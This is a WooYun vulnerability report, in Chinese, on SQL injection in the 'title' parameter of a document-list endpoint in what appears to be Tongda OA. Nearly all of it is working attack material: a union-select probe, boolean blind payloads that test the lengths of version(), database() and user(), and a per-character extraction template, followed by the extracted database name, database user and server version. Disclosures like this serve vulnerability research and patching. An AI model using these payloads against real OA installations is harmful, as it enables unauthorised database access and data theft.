WooYun.org

**.**.**.**/general/document/index.php/send/sendlist/send_for/?tid=&title=1
参数title可注入

**.**.**.**/general/document/index.php/send/sendlist/send_for/?tid=&title=1%' and 1=2 union select

不安全的SQL语句：联合查询
select count(*) as total from doc_send_data as a where 1 = 1 and title like '%1%' and 1=2 union select%' and status='6' and a.creator='admin'

**.**.**.**/general/document/index.php/send/sendlist/send_for/?tid=&title=1%' and length(version())=41  and 'a%'='a

**.**.**.**/general/document/index.php/send/sendlist/send_for/?tid=&title=1%' and length(database())=5  and 'a%'='a

**.**.**.**/general/document/index.php/send/sendlist/send_for/?tid=&title=1%' and length(user())=14  and 'a%'='a

**.**.**.**/general/document/index.php/send/sendlist/send_for/?tid=&title=1%' and CONV(HEX(SUBSTRING(database(),1,1)),16,10)=116 and 'a%'='a

**.**.**.**/general/document/index.php/send/sendlist/send_for/?tid=&title=1%' and CONV(HEX(SUBSTRING(database(),{1},1)),16,10)={1} and 'a%'='a

td_oa

root@**.**.**.**

5.5.36-enterprise-commercial-advanced-log